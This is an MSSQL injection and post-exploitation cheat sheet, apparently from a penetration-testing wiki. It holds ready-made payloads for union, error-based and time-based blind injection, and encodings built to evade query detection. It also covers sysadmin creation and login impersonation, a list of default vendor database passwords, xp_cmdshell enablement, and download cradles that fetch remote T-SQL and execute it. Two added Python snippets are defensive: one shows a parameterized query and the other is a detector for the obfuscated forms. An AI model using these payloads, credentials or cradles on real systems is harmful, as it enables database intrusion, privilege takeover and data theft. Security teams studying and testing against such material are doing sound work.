DBMS Identification

| Description | Statement |
| --- | --- |
| WAITFOR function | page.asp?id=';WAITFOR DELAY '00:00:10'; -- |
| Default variable | page.asp?id=sql'; SELECT @@SERVERNAME -- |
| Error message. Note: triggering a database error with invalid syntax sometimes returns a verbose error message that contains the DBMS name. | page.asp?id=' |
| Error message. Note: if the id parameter is an integer, the string value of the @@SERVERNAME variable may cause a conversion error. | page.asp?id=@@SERVERNAME |
| Error message. Note: if the id parameter is an integer, the string value of the @@SERVERNAME variable may cause a conversion error. | page.asp?id=0/@@SERVERNAME |

General Tips

ASP/ASPX-based applications are usually backed by MSSQL.

Converting a Query into an Injection

| Description | Statement |
| --- | --- |
| Union query | product.asp?id=' UNION SELECT @@version -- |
| Union subquery | product.asp?id=' UNION (SELECT @@version) -- |
| Union null. Note: if the original query returns more than one column, add nulls until the column counts match. | product.asp?id=' UNION (SELECT @@version,null) -- |
| Stacked query. Note: stacked queries do not always return results, so they are best suited to injections that update or modify data. | product.asp?id='; SELECT @@version -- |

Injection Types

Error Based

Error-based injection is exploited by triggering an error in the database when invalid input is passed to it. The error messages can be used to return the full query results, or to obtain information about how to restructure the query for further exploitation.

| Description | Statement |
| --- | --- |
| Explicit conversion (convert) | SELECT convert(int,(SELECT @@version)) |
| Explicit conversion (cast) | SELECT cast((SELECT @@version) as int) |
| Implicit conversion | SELECT 1/@@version |

Any of the following queries can be rewritten with the convert function or as an implicit conversion.

| Description | Statement |
| --- | --- |
| Inject the CAST function into the current query | SELECT CAST(@@version as int) |
| Display the system user | SELECT CAST(SYSTEM_USER as int); |
| Display all databases on one line with FOR XML PATH | SELECT CAST((SELECT name,',' FROM master..sysdatabases FOR XML path('')) as int) |
| Display all databases on one line with FOR XML PATH (data() form) | SELECT CAST((SELECT name AS "data()" FROM master..sysdatabases FOR xml path('')) AS int); |
| Display the server name | SELECT CAST(@@SERVERNAME as int); |
| Display the service name | SELECT CAST(@@SERVICENAME as int); |
| Display the list of databases. Note: the query below must be executed on a single line. | DECLARE @listStr VARCHAR(MAX);DECLARE @myoutput VARCHAR(MAX);SET @listStr = '';SELECT @listStr = @listStr + Name + ',' FROM master..sysdatabases;SELECT @myoutput = SUBSTRING(@listStr , 1, LEN(@listStr)-1);SELECT CAST(@myoutput as int); |
| Display the list of tables. Note: the query below must be executed on a single line. | DECLARE @listStr VARCHAR(MAX);DECLARE @myoutput VARCHAR(MAX); SET @listStr = '';SELECT @listStr = @listStr + Name + ',' FROM MYDATABASE..sysobjects WHERE type = 'U';SELECT @myoutput = SUBSTRING(@listStr , 1, LEN(@listStr)-1);SELECT CAST(@myoutput as int); |
| Display the list of columns. Note: the query below must be executed on a single line. | DECLARE @listStr VARCHAR(MAX);DECLARE @myoutput VARCHAR(MAX);SET @listStr = '';SELECT @listStr = @listStr + Name + ',' FROM MYDATABASE..syscolumns WHERE id=object_id('MYTABLE');SELECT @myoutput = SUBSTRING(@listStr , 1, LEN(@listStr)-1);SELECT CAST(@myoutput as int); |
| Display column data. Note: the query below must be executed on a single line. Replace MYCOLUMN with * to select all columns. | DECLARE @listStr VARCHAR(MAX);DECLARE @myoutput VARCHAR(MAX);SET @listStr = '';SELECT @listStr = @listStr + MYCOLUMN + ',' FROM MYDATABASE..MYTABLE;SELECT @myoutput = SUBSTRING(@listStr , 1, LEN(@listStr)-1);SELECT CAST(@myoutput as int); |
| Display one database name at a time. Note: increment the inner TOP value to get the next record. | SELECT TOP 1 CAST(name as int) FROM sysdatabases WHERE name in (SELECT TOP 2 name FROM sysdatabases ORDER BY name ASC) ORDER BY name DESC |

Union Query Injection

Union-based SQL injection allows an attacker to extract information from the database by extending the results returned by the original query. The union operator can only be used when the original and the new query have the same structure (number of columns and data types).

| Description | Statement |
| --- | --- |
| Union | SELECT user UNION SELECT @@version |
| Union subquery | SELECT user UNION (SELECT @@version) |
| Union null. Note: if the original query returns more than one column, add nulls until the column counts match. | SELECT user,system_user UNION (SELECT @@version,null) |
| Union null binary halving. Note: this query is used to detect the number of columns. A [numberOfColumns] greater than the actual column count returns an error, which reveals the number of columns in the table. | SELECT * FROM yourtable ORDER BY [numberOfColumns] |
| Stacked query. Note: stacked queries do not always return results, so they are best suited to injections that update or modify data. | SELECT @@version; SELECT @@version -- |

Blind

Blind injection is one of the more advanced injection methods. Partially blind and fully blind methods are detailed below. Be careful when running these queries: executed with heavy automation, they can overload the server.

Partially Blind

Partially blind injections are queries that return an HTTP status code, or some other marker in the HTML response, that indicates whether a statement was true or false. The queries below attempt to exploit the injection by asserting a true or false response on guessed information. True/false queries can also be identified by their returning 1 (true) or 0 (false) rows; an error can also identify 0 (false).

| Description | Statement |
| --- | --- |
| Version is 12.0.2000.8 | SELECT @@version WHERE @@version LIKE '%12.0.2000.8%' |
| Subselects are enabled | SELECT (SELECT @@version) |
| Table log_table exists | SELECT * FROM log_table |
| Column message exists in table log_table | SELECT message from log_table |
| The first letter of the first message is t | WITH data AS (SELECT (ROW_NUMBER() OVER (ORDER BY message)) as row,* FROM log_table) SELECT message FROM data WHERE row = 1 and message like 't%' |

Converting Partially Blind Queries into Fully Blind Queries

Any of the queries above can be used in a fully blind scenario by applying the following transformation:

IF exists(PARTIAL_BLIND_QUERY) WAITFOR DELAY '00:00:02'

Fully Blind

Fully blind queries give no indication of the query result in the HTTP/HTML response. This makes them dependent on timing functions and other out-of-band attack methods. A true SQL statement takes X seconds to respond, while a false one should return immediately.

| Description | Statement |
| --- | --- |
| Version is 12.0.2000.8 | IF exists(SELECT @@version where @@version like '%12.0.2000.8%') WAITFOR DELAY '00:00:02' |

Injection Techniques

Conditional Statements

| Description | Statement |
| --- | --- |
| Case | SELECT CASE WHEN 1=1 THEN 1 ELSE 0 END |
| If/Else | IF 1=2 SELECT 'true' ELSE SELECT 'false'; |

Injection Location

| Injection location | Statement | Injection string |
| --- | --- | --- |
| SELECT -> WHERE | SELECT * FROM USERS WHERE "USER"='$injection'; | ' or 1=1 -- |
| UPDATE -> SET | UPDATE USERS SET "email"='$injection' WHERE "USER"='NetSPI'; | '+'harold@netspi.com'+' |
| UPDATE -> WHERE. Note: try setting the injection string to a valid WHERE value. If the object is updated, the injection succeeded. | UPDATE USERS SET "email"='harold@netspi.com' WHERE "USER"='$injection'; | '+'NetSPI'+' |
| DELETE -> WHERE | DELETE USERS WHERE "User"='$injection'; | '+'NetSPI'+' |
| INSERT -> VALUES | INSERT INTO USERS ([User], [Password]) VALUES ('$injection', 'password'); | '+(select @@version)+' |
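An added example, not from the wiki: it reproduces the SELECT -> WHERE row of the table above in an in-memory SQLite database (standing in for MSSQL; the single-quote and `--` comment behaviour is the same for this case) and sets the concatenated statement beside its parameterized form. The sample rows and the function names are assumptions.

```python
import sqlite3

# The injection string from the SELECT -> WHERE row above.
INJECTION = "' or 1=1 --"


def make_db() -> sqlite3.Connection:
    """Constructed sample data: three users, none of them matching the payload."""
    conn = sqlite3.connect(":memory:")
    conn.execute('CREATE TABLE USERS ("USER" TEXT, email TEXT)')
    conn.executemany(
        "INSERT INTO USERS VALUES (?, ?)",
        [("NetSPI", "harold@netspi.com"),
         ("alice", "alice@example.test"),
         ("bob", "bob@example.test")],
    )
    return conn


def lookup_vulnerable(conn: sqlite3.Connection, user: str) -> list:
    """$injection pasted into the statement text, exactly as the table shows.

    With INJECTION the WHERE clause becomes  "USER"='' or 1=1 --'  so every
    row matches and the original closing quote is commented out.
    """
    sql = "SELECT * FROM USERS WHERE \"USER\"='" + user + "';"
    return conn.execute(sql).fetchall()


def lookup_safe(conn: sqlite3.Connection, user: str) -> list:
    """Same query with a bound parameter: the input can only ever be a value,
    so the payload is compared literally against the USER column."""
    return conn.execute('SELECT * FROM USERS WHERE "USER"=?', (user,)).fetchall()


if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", len(lookup_vulnerable(db, INJECTION)), "rows")  # 3
    print("parameterized:", len(lookup_safe(db, INJECTION)), "rows")     # 0
```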

Injection Obfuscation

| Description | Statement |
| --- | --- |
| ASCII > character | SELECT char(65) |
| Character > ASCII | SELECT ascii('A') |
| Hex > int | SELECT 0x20 + 0x40 |
| Bitwise AND | SELECT 6 & 2 |
| Bitwise OR | SELECT 6 \| 2 |
| Bitwise NOT | SELECT ~6 |
| Bitwise XOR | SELECT 6 ^ 2 |
| Substring: substring(string, index, length) | SELECT substring('abcd', 3, 2) |
| Casting | SELECT cast('1' AS int); SELECT cast('123' AS char) |
| String concatenation | SELECT concat('net','spi') |
| Comment (line) | SELECT 1 --comment |
| Comment (inline) | SELECT/*comment*/1 |
| Avoiding quotes | SELECT char(65)+char(66) -- returns AB |
| Avoiding semicolons with %0d | %0dwaitfor+delay+'0:0:10'-- |
| Bypass filtering with mixed case | EXEC xP_cMdsheLL 'dir'; |
| Avoiding spaces with comments | EXEC/**/xp_cmdshell/**/'dir';-- |
| Avoiding spaces with comments (split keywords) | ';ex/**/ec xp_cmds/**/hell 'dir'; |
| Avoiding query detection with concatenation | DECLARE @cmd as varchar(3000); SET @cmd = 'x'+'p'+'_'+'c'+'m'+'d'+'s'+'h'+'e'+'l'+'l'+'/**/'+''''+'d'+'i'+'r'+''''; exec(@cmd); |
| Avoiding query detection with char encoding | DECLARE @cmd as varchar(3000); SET @cmd =(CHAR(101)+CHAR(120)+CHAR(101)+CHAR(99)+CHAR(32)+ CHAR(109)+CHAR(97)+CHAR(115)+CHAR(116) +CHAR(101)+CHAR(114)+CHAR(46)+CHAR(46)+CHAR(120)+ CHAR(112)+CHAR(95)+CHAR(99)+CHAR(109)+ CHAR(100)+CHAR(115)+CHAR(104)+CHAR(101)+CHAR(108)+CHAR(108)+CHAR(32)+ CHAR(39)+CHAR(100)+CHAR(105)+CHAR(114)+CHAR(39)+CHAR(59)); EXEC(@cmd); |
| Avoiding query detection with base64 encoding | DECLARE @data varchar(max), @XmlData xml;SET @data = 'ZXhlYyBtYXN0ZXIuLnhwX2NtZHNoZWxsICdkaXIn'; SET @XmlData = CAST('<data>' + @data + '</data>' as xml);SET @data = CONVERT(varchar(max), @XmlData.value('(data)[1]', 'varbinary(max)')); exec (@data); |
| Avoiding query detection with nchar encoding | DECLARE @cmd as nvarchar(3000); SET @cmd =(nchar(101)+nchar(120)+nchar(101)+nchar(99)+ nchar(32)+nchar(109)+nchar(97)+nchar(115)+nchar(116)+ nchar(101)+nchar(114)+nchar(46)+nchar(46)+ nchar(120)+nchar(112)+nchar(95)+nchar(99)+nchar(109) +nchar(100)+nchar(115)+nchar(104)+ nchar(101)+nchar(108)+nchar(108)+nchar(32)+nchar(39)+nchar(100) +nchar(105)+nchar(114)+nchar(39)+nchar(59)); EXEC(@cmd); |
| Avoiding query detection with ASCII + CAST | DECLARE @cmd as varchar(MAX); SET @cmd = cast(0x78705F636D647368656C6C202764697227 as varchar(MAX)); exec(@cmd); |
| Avoiding query detection with ASCII + CONVERT | DECLARE @cmd as varchar(MAX); SET @cmd = convert(varchar(MAX),0x78705F636D647368656C6C202764697227); exec(@cmd); |
| Avoiding query detection with varbinary(MAX) | DECLARE @cmd as varchar(MAX); SET @cmd = convert(varchar(0),0x78705F636D647368656C6C202764697227); exec(@cmd); |
| Avoiding EXEC() with sp_sqlexec | DECLARE @cmd as varchar(3000); SET @cmd = convert(varchar(0),0x78705F636D647368656C6C202764697227); exec sp_sqlexec @cmd; |
| Executing xp_cmdshell 'dir' through a variable holding the procedure name | DECLARE @tmp as varchar(MAX); SET @tmp = char(88)+char(80)+char(95)+char(67)+char(77)+ char(68)+char(83)+char(72)+char(69)+char(76)+char(76); exec @tmp 'dir'; |
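An added example, not part of the wiki: a hypothetical normalizer for a query-log monitor that undoes the encodings in the table above (mixed case, /**/ comments, 'x'+'p' concatenation, CHAR()/NCHAR() sequences, 0x hex literals and base64 literals) so the underlying procedure name can be matched. The WATCH list and the sample statements are taken from this page; the function names and the decoding order are assumptions.

```python
import base64
import re

# Input is the statement text as SQL Server receives it, i.e. after the web
# tier has already URL-decoded it.  Comments are replaced with nothing so that
# the split-keyword trick (ex/**/ec) is rejoined; substring matching below
# tolerates the tokens that then run together (EXECxp_cmdshell).
COMMENT = re.compile(r"/\*.*?\*/", re.DOTALL)
CHAR_CALL = re.compile(r"\bn?char\((\d+)\)", re.IGNORECASE)   # not varchar(...)
HEX_LITERAL = re.compile(r"\b0x([0-9A-Fa-f]{2,})\b")
QUOTED = re.compile(r"'((?:[^']|'')*)'")                       # '' is an escaped quote
JOIN_QUOTES = re.compile(r"'\s*\+\s*'")                        # 'x'+'p' -> 'xp'
B64_SHAPE = re.compile(r"^[A-Za-z0-9+/]{16,}={0,2}$")

# Procedure names from this page that a defender wants to alert on.
WATCH = ("xp_cmdshell", "sp_sqlexec", "sp_oacreate", "xp_regwrite",
         "xp_dirtree", "xp_fileexist", "waitfor delay")


def _literal(text: str) -> str:
    """Re-wrap decoded text as a T-SQL string literal (inner quotes doubled)."""
    return "'" + text.replace("'", "''") + "'"


def _decode_hex(m) -> str:
    digits = m.group(1)
    if len(digits) % 2:                      # odd length: not a byte string
        return m.group(0)
    return _literal(bytes.fromhex(digits).decode("latin-1"))


def _decode_b64(m) -> str:
    body = m.group(1)
    if not B64_SHAPE.match(body):
        return m.group(0)
    try:
        text = base64.b64decode(body, validate=True).decode("ascii")
    except (ValueError, UnicodeDecodeError):
        return m.group(0)
    return _literal(text) if text.isprintable() else m.group(0)


def normalize(sql: str) -> str:
    """Lower-cased form of sql with the encodings from the table undone."""
    s = COMMENT.sub("", sql)
    s = CHAR_CALL.sub(lambda m: _literal(chr(int(m.group(1)))), s)   # char(120) -> 'x'
    s = HEX_LITERAL.sub(_decode_hex, s)                               # 0x7870.. -> 'xp..'
    s = QUOTED.sub(_decode_b64, s)                                    # 'ZXhl..' -> 'exec..'
    s = JOIN_QUOTES.sub("", s)                                        # 'x'+'p'+'_' -> 'xp_'
    return re.sub(r"\s+", " ", s).lower()


def suspicious(sql: str) -> list:
    """Names from WATCH that appear once the statement is normalized."""
    norm = normalize(sql)
    return [name for name in WATCH if name in norm]


# Constructed samples, copied from the obfuscation table above.
CHAR_SAMPLE = ("DECLARE @cmd as varchar(3000); SET @cmd =(CHAR(101)+CHAR(120)+CHAR(101)+CHAR(99)+"
               "CHAR(32)+CHAR(109)+CHAR(97)+CHAR(115)+CHAR(116)+CHAR(101)+CHAR(114)+CHAR(46)+"
               "CHAR(46)+CHAR(120)+CHAR(112)+CHAR(95)+CHAR(99)+CHAR(109)+CHAR(100)+CHAR(115)+"
               "CHAR(104)+CHAR(101)+CHAR(108)+CHAR(108)+CHAR(32)+CHAR(39)+CHAR(100)+CHAR(105)+"
               "CHAR(114)+CHAR(39)+CHAR(59)); EXEC(@cmd);")
B64_SAMPLE = ("DECLARE @data varchar(max), @XmlData xml;SET @data = "
              "'ZXhlYyBtYXN0ZXIuLnhwX2NtZHNoZWxsICdkaXIn'; SET @XmlData = CAST('<data>' + @data + "
              "'</data>' as xml);SET @data = CONVERT(varchar(max), @XmlData.value('(data)[1]', "
              "'varbinary(max)')); exec (@data);")
SP_SQLEXEC_SAMPLE = ("DECLARE @cmd as varchar(3000); SET @cmd = convert(varchar(0),"
                     "0x78705F636D647368656C6C202764697227); exec sp_sqlexec @cmd;")
```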

Exploitation

Information Gathering

Gathering information about any test environment is generally valuable; version numbers, user accounts and databases all help in escalating a vulnerability. Common methods follow.
* Requires a privileged user

| Description | Statement |
| --- | --- |
| Version | SELECT @@version; |
| Current user | SELECT user; SELECT system_user; SELECT user_name(); SELECT loginame from master..sysprocesses where spid = @@SPID |
| All users | SELECT name from master..syslogins |
| All tables | SELECT table_catalog, table_name FROM information_schema.columns |
| All columns | SELECT table_catalog, column_name FROM information_schema.columns |
| All databases | SELECT name from master..sysdatabases; |
| Current database | SELECT db_name(); |
| Server name | SELECT @@SERVERNAME |
| Find stored procedures | SELECT * from master..sysobjects where name like 'sp%' order by name desc |
| Get SUID from username | SELECT SUSER_ID('sa') |
| Get username from SUID | SELECT SUSER_NAME(1) |
| Check whether the account is a sysadmin | SELECT is_srvrolemember('sysadmin'); |
| Check whether the account is a sysadmin (hex-encoded role name) | SELECT IS_SRVROLEMEMBER(convert(varchar,0x73797361646D696E)) |
| Policies | SELECT p.policy_id, p.name as [PolicyName], p.condition_id, c.name as [ConditionName], c.facet, c.expression as [ConditionExpression], p.root_condition_id, p.is_enabled, p.date_created, p.date_modified, p.description, p.created_by, p.is_system, t.target_set_id, t.TYPE, t.type_skeleton FROM msdb.dbo.syspolicy_policies p INNER JOIN syspolicy_conditions c ON p.condition_id = c.condition_id INNER JOIN msdb.dbo.syspolicy_target_sets t ON t.object_set_id = p.object_set_id |
| Domain users | https://raw.githubusercontent.com/NetSPI/PowerUpSQL/master/templates/tsql/Get-SQLDomainUser-Example.sql |
| DB audits | SELECT a.audit_id, a.name as audit_name, s.name as database_specification_name, d.audit_action_name, d.major_id, OBJECT_NAME(d.major_id) as object, s.is_state_enabled, d.is_group, s.create_date, s.modify_date, d.audited_result FROM sys.server_audits AS a JOIN sys.database_audit_specifications AS s ON a.audit_guid = s.audit_guid JOIN sys.database_audit_specification_details AS d ON s.database_specification_id = d.database_specification_id |
| Server audits | SELECT audit_id, a.name as audit_name, s.name as server_specification_name, d.audit_action_name, s.is_state_enabled, d.is_group, d.audit_action_id, s.create_date, s.modify_date FROM sys.server_audits AS a JOIN sys.server_audit_specifications AS s ON a.audit_guid = s.audit_guid JOIN sys.server_audit_specification_details AS d ON s.server_specification_id = d.server_specification_id |
| Query history | SELECT * FROM (SELECT COALESCE(OBJECT_NAME(qt.objectid),'Ad-Hoc') AS objectname, qt.objectid as objectid, last_execution_time, execution_count, encrypted,(SELECT TOP 1 SUBSTRING(qt.TEXT,statement_start_offset / 2+1,( (CASE WHEN statement_end_offset = -1 THEN (LEN(CONVERT(NVARCHAR(MAX),qt.TEXT)) * 2) ELSE statement_end_offset END)- statement_start_offset) / 2+1)) AS sql_statement FROM sys.dm_exec_query_stats AS qs CROSS APPLY sys.dm_exec_sql_text(sql_handle) AS qt ) x ORDER BY execution_count DESC |

Data Targeting

Being able to correctly identify and target sensitive information can reduce the time spent in the database dramatically, which leaves more time for other directions.

| Description | Statement |
| --- | --- |
| List non-default databases | SELECT NAME FROM sysdatabases WHERE (NAME NOT LIKE 'distribution') AND (NAME NOT LIKE 'master') AND (NAME NOT LIKE 'model') AND (NAME NOT LIKE 'msdb') AND (NAME NOT LIKE 'publication') AND (NAME NOT LIKE 'reportserver') AND (NAME NOT LIKE 'reportservertempdb') AND (NAME NOT LIKE 'resource') AND (NAME NOT LIKE 'tempdb') ORDER BY NAME; |
| List non-default tables | SELECT '[' + SCHEMA_NAME(t.schema_id) + '].[' + t.name + ']' AS fulltable_name, SCHEMA_NAME(t.schema_id) AS schema_name, t.name AS table_name, i.rows FROM sys.tables AS t INNER JOIN sys.sysindexes AS i ON t.object_id = i.id AND i.indid < 2 WHERE (ROWS > 0) AND (t.name NOT LIKE 'syscolumns') AND (t.name NOT LIKE 'syscomments') AND (t.name NOT LIKE 'sysconstraints') AND (t.name NOT LIKE 'sysdepends') AND (t.name NOT LIKE 'sysfilegroups') AND (t.name NOT LIKE 'sysfiles') AND (t.name NOT LIKE 'sysforeignkeys') AND (t.name NOT LIKE 'sysfulltextcatalogs') AND (t.name NOT LIKE 'sysindexes') AND (t.name NOT LIKE 'sysindexkeys') AND (t.name NOT LIKE 'sysmembers') AND (t.name NOT LIKE 'sysobjects') AND (t.name NOT LIKE 'syspermissions') AND (t.name NOT LIKE 'sysprotects') AND (t.name NOT LIKE 'sysreferences') AND (t.name NOT LIKE 'systypes') AND (t.name NOT LIKE 'sysusers') ORDER BY TABLE_NAME; |
| Column name search | SELECT * FROM INFORMATION_SCHEMA.COLUMNS WHERE COLUMN_NAME like '%password%' |
| List non-default columns | SELECT * FROM INFORMATION_SCHEMA.COLUMNS WHERE CHARACTER_MAXIMUM_LENGTH > 14 AND DATA_TYPE NOT IN ('bigint','binary','bit','cursor','date','datetime','datetime2', 'datetimeoffset','float','geography','hierarchyid','image','int','money','real', 'smalldatetime','smallint','smallmoney','sql_variant','table','time','timestamp', 'tinyint','uniqueidentifier','varbinary','xml') AND TABLE_NAME='CreditCard' OR CHARACTER_MAXIMUM_LENGTH < 1 AND DATA_TYPE NOT IN ( 'bigint', 'binary', 'bit', 'cursor', 'date', 'datetime', 'datetime2', 'datetimeoffset', 'float', 'geography', 'hierarchyid', 'image', 'int', 'money', 'real', 'smalldatetime', 'smallint', 'smallmoney', 'sql_variant', 'table', 'time', 'timestamp', 'tinyint', 'uniqueidentifier', 'varbinary', 'xml') AND TABLE_NAME='CreditCard' ORDER BY COLUMN_NAME; |
| Search for transparent encryption | SELECT a.database_id as [dbid], a.name, HAS_DBACCESS(a.name) as [has_dbaccess], SUSER_SNAME(a.owner_sid) as [db_owner], a.is_trustworthy_on, a.is_db_chaining_on, a.is_broker_enabled, a.is_encrypted, a.is_read_only, a.create_date, a.recovery_model_desc, b.filename FROM [sys].[databases] a INNER JOIN [sys].[sysdatabases] b ON a.database_id = b.dbid WHERE a.is_encrypted=1 ORDER BY a.database_id |
| Search by database size | SELECT a.database_id as [dbid], a.name, HAS_DBACCESS(a.name) as [has_dbaccess], SUSER_SNAME(a.owner_sid) as [db_owner], a.is_trustworthy_on, a.is_db_chaining_on, a.is_broker_enabled, a.is_encrypted, a.is_read_only, a.create_date, a.recovery_model_desc, b.filename, (SELECT CAST(SUM(size) * 8. / 1024 AS DECIMAL(8,2)) from sys.master_files where name like a.name) as [DbSizeMb] FROM [sys].[databases] a INNER JOIN [sys].[sysdatabases] b ON a.database_id = b.dbid ORDER BY DbSizeMb DESC |

Privilege Escalation

* Requires a privileged user. The queries below need various permission types. Stay tuned for detailed privilege-escalation paths.

| Description | Statement |
| --- | --- |
| Create a DBA user * | EXEC master.dbo.sp_addsrvrolemember 'user', 'sysadmin'; |
| Grant execute on all custom objects | SELECT 'grant exec on ' + QUOTENAME(ROUTINE_SCHEMA) + '.' + QUOTENAME(ROUTINE_NAME) + ' TO test' FROM INFORMATION_SCHEMA.ROUTINES WHERE OBJECTPROPERTY(OBJECT_ID(ROUTINE_NAME),'IsMSShipped') = 0 ; |
| Grant execute on all stored procedures | CREATE ROLE db_executor; GRANT EXECUTE TO db_executor; exec sp_addrolemember 'db_executor', 'YourSecurityAccount' |
| UNC path injection | https://gist.github.com/nullbind/7dfca2a6309a4209b5aeef181b676c6e https://blog.netspi.com/executing-smb-relay-attacks-via-sql-server-using-metasploit/ |
| Detect non-impersonated logins | SELECT distinct b.name FROM sys.server_permissions a INNER JOIN sys.server_principals b ON a.grantor_principal_id = b.principal_id WHERE a.permission_name = 'IMPERSONATE' |
| Impersonate a login. Note: REVERT returns you to the original login. | EXECUTE AS LOGIN = 'sa'; SELECT @@VERSION; |
| Create a sysadmin user * | USE [master] GO CREATE LOGIN [test] WITH PASSWORD=N'test', DEFAULT_DATABASE=[master], CHECK_EXPIRATION=OFF, CHECK_POLICY=OFF GO EXEC master..sp_addsrvrolemember @loginame=N'test', @rolename=N'sysadmin' GO |
| Create a sysadmin user * | EXEC sp_addlogin 'user', 'pass'; EXEC master.dbo.sp_addsrvrolemember 'user', 'sysadmin'; |
| Delete a user * | EXEC sp_droplogin 'user'; |
| Retrieve SQL Agent connection passwords | exec msdb.dbo.sp_get_sqlagent_properties |
| Retrieve DTS connection passwords | select msdb.dbo.rtbldmbprops |
| Get sysadmin as local administrator | https://blog.netspi.com/get-sql-server-sysadmin-privileges-local-admin-powerupsql/ |
| Startup stored procedures | https://blog.netspi.com/sql-server-persistence-part-1-startup-stored-procedures/ |
| Trigger creation | https://blog.netspi.com/maintaining-persistence-via-sql-server-part-2-triggers/ |
| Windows auto-login passwords | https://blog.netspi.com/get-windows-auto-login-passwords-via-sql-server-powerupsql/ |
| xp_regwrite execution as non-sysadmin | https://gist.github.com/nullbind/03af8d671621a6e1cef770bace19a49e |
| Stored procedures with trustworthy databases | https://blog.netspi.com/hacking-sql-server-stored-procedures-part-1-untrustworthy-databases |
| Stored procedure user impersonation | https://blog.netspi.com/hacking-sql-server-stored-procedures-part-2-user-impersonation/ |
| Default passwords | sa:sa sa:[empty] [username]:[username] |
| Default instance passwords (instance name, user, password) | "ACS","ej","ej" "ACT7","sa","sage" "AOM2","admin","ca_admin" "ARIS","ARIS9","*ARIS!1dm9n#" "AutodeskVault","sa","AutodeskVault@26200" "BOSCHSQL","sa","RPSsql12345" "BPASERVER9","sa","AutoMateBPA9" "CDRDICOM","sa","CDRDicom50!" "CODEPAL","sa","Cod3p@l" "CODEPAL08","sa","Cod3p@l" "CounterPoint","sa","CounterPoint8" "CSSQL05","ELNAdmin","ELNAdmin" "CSSQL05","sa","CambridgeSoft_SA" "CADSQL","CADSQLAdminUser","Cr41g1sth3M4n!" "DHLEASYSHIP","sa","DHLadmin@1" "DPM","admin","ca_admin" "DVTEL","sa","" "EASYSHIP","sa","DHLadmin@1" "ECC","sa","Webgility2011" "ECOPYDB","e+C0py2007_@x","e+C0py2007_@x" "ECOPYDB","sa","ecopy" "Emerson2012","sa","42Emerson42Eme" "HDPS","sa","sa" "HPDSS","sa","Hpdsdb000001" "HPDSS","sa","hpdss" "INSERTGT","msi","keyboa5" "INSERTGT","sa","" "INTRAVET","sa","Webster#1" "MYMOVIES","sa","t9AranuHA7" "PCAMERICA","sa","pcAmer1ca" "PCAMERICA","sa","PCAmerica" "PRISM","sa","SecurityMaster08" "RMSQLDATA","Super","Orange" "RTCLOCAL","sa","mypassword" "SALESLOGIX","sa","SLXMaster" "SIDEXIS_SQL","sa","2BeChanged" "SQL2K5","ovsd","ovsd" "SQLEXPRESS","admin","ca_admin" "STANDARDDEV2014","test","test" "TEW_SQLEXPRESS","tew","tew" "vocollect","vocollect","vocollect" "VSDOTNET","sa","" "VSQL","sa","111" |

Command Execution

| Name | Statement |
| --- | --- |
| xp_cmdshell | /* Enable show advanced options */ sp_configure 'show advanced options', 1; RECONFIGURE; /* Enable xp_cmdshell */ sp_configure 'xp_cmdshell', 1; RECONFIGURE; EXEC xp_cmdshell 'net user' |
| Write to registry autorun | https://blog.netspi.com/establishing-registry-persistence-via-sql-server-powerupsql/ https://gist.github.com/nullbind/03af8d671621a6e1cef770bace19a49e |
| Write to file autorun | https://blog.netspi.com/how-to-hack-database-links-in-sql-server/ |
| Agent Job | https://www.optiv.com/blog/mssql-agent-jobs-for-command-execution |
| SQL injection in stored procedures | https://blog.netspi.com/hacking-sql-server-stored-procedures-part-3-sqli-and-user-impersonation/ |
| CLR assemblies | https://blog.netspi.com/attacking-sql-server-clr-assemblies/ |
| Custom extended stored procedures | https://github.com/NetSPI/PowerUpSQL/blob/master/templates/cmd_exec.cpp |

TSQL

| Name | Statement |
| --- | --- |
| ActiveX JScript Agent Job | https://github.com/NetSPI/PowerUpSQL/blob/master/templates/tsql/oscmdexec_agentjob_activex_jscript.sql |
| ActiveX VBScript Agent Job | https://github.com/NetSPI/PowerUpSQL/blob/master/templates/tsql/oscmdexec_agentjob_activex_vbscript.sql |
| CmdExec Agent Job | https://github.com/NetSPI/PowerUpSQL/blob/master/templates/tsql/oscmdexec_agentjob_cmdexec.sql |
| PowerShell Agent Job | https://github.com/NetSPI/PowerUpSQL/blob/master/templates/tsql/oscmdexec_agentjob_powershell.sql |
| Custom command shell (extended procedure) | https://github.com/NetSPI/PowerUpSQL/blob/master/templates/tsql/oscmdexec_customxp.cpp |
| OLE Automation object | https://github.com/NetSPI/PowerUpSQL/blob/master/templates/tsql/oscmdexec_oleautomationobject.sql |
| OPENROWSET | https://github.com/NetSPI/PowerUpSQL/blob/master/templates/tsql/oscmdexec_openrowset.sql |
| Python | https://github.com/NetSPI/PowerUpSQL/blob/master/templates/tsql/oscmdexec_pythonscript.tsql |
| R | https://github.com/NetSPI/PowerUpSQL/blob/master/templates/tsql/oscmdexec_rscript.sql |
| xp_cmdshell proxy | https://github.com/NetSPI/PowerUpSQL/blob/master/templates/tsql/oscmdexec_xpcmdshell_proxy.sql |

File Read/Write

* Requires a privileged user

| Description | Statement |
| --- | --- |
| Download cradle: Bulk Insert (TSQL) | /* Bulk Insert - Download Cradle Example */ /* Setup variables */ DECLARE @cmd varchar(8000); /* Create temp table */ CREATE TABLE #file (content nvarchar(4000)); /* Read file into temp table - web server must support PROPFIND */ BULK INSERT #file FROM '\\sharepoint.acme.com@SSL\Path\to\file.txt'; /* Select contents of file */ SELECT @cmd = content FROM #file; /* Display command */ SELECT @cmd; /* Run command */ EXECUTE(@cmd); /* Drop the temp table */ DROP TABLE #file |
| Download cradle: OLE Automation Procedure 1 (SQL) | /* OLE Automation Procedure - Download Cradle Example. Does not require a table, but cannot handle larger payloads. Note: this also works with UNC paths (\\ip\file.txt) and with WebDAV paths (\\ip@80\file.txt); the target web server needs to support PROPFIND. */ /* Setup variables */ DECLARE @url varchar(300); DECLARE @WinHTTP int; DECLARE @handle int; DECLARE @Command varchar(8000); /* Set target URL containing TSQL */ SET @url = 'http://127.0.0.1/mycmd.txt'; /* Setup namespace */ EXEC @handle=sp_OACreate 'WinHttp.WinHttpRequest.5.1',@WinHTTP OUT; /* Call the Open method to set up the HTTP request */ EXEC @handle=sp_OAMethod @WinHTTP, 'Open',NULL,'GET',@url,'false'; /* Call the Send method to send the HTTP GET request */ EXEC @handle=sp_OAMethod @WinHTTP,'Send'; /* Capture the HTTP response content */ EXEC @handle=sp_OAGetProperty @WinHTTP,'ResponseText', @Command out; /* Destroy the object */ EXEC @handle=sp_OADestroy @WinHTTP; /* Display command */ SELECT @Command; /* Run command */ EXECUTE (@Command) |
